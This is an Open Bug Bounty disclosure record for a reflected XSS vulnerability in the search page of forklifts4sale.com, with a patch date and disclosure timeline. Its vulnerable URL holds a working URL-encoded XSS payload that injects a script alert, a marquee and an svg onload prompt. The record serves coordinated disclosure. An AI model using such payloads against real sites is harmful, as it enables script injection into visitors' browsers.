forklifts4sale.com XSS vulnerability

2015-05-25T15:33:00
ID OBB:64379
Type openbugbounty
Reporter RahulKankrale
Modified 2017-11-22T08:57:00

Description

Vulnerable URL:
http://www.forklifts4sale.com/search.php?txt=%3E%3C%2Ftitle%3E%3Cscript%3Ealert%28KCF%29%3C%2Fscript%3E%27%22%3E%3Cmarquee%3E%3Ch1%3Etest%3C%2Fh1%3E%3C%2Fmarquee%3E%3Csvg%2Fonload%3Dprompt%28%2FXSSPOSED%2F%29%3E&make;=Choose...&equip;_type=Choose...&capacity;=Choose...
Details:

Description| Value
---|---
Patched:| Yes, at 22.11.2017
Latest check for patch:| 22.11.2017 08:57 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 13093597
Google Pagerank| 0
VIP website status:| No
Check forklifts4sale.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 25 May, 2015 15:33 GMT
Vulnerability existence verified and confirmed| 25 May, 2015 15:35 GMT
Vulnerability patched by the website owner| 22 November, 2017 08:57 GMT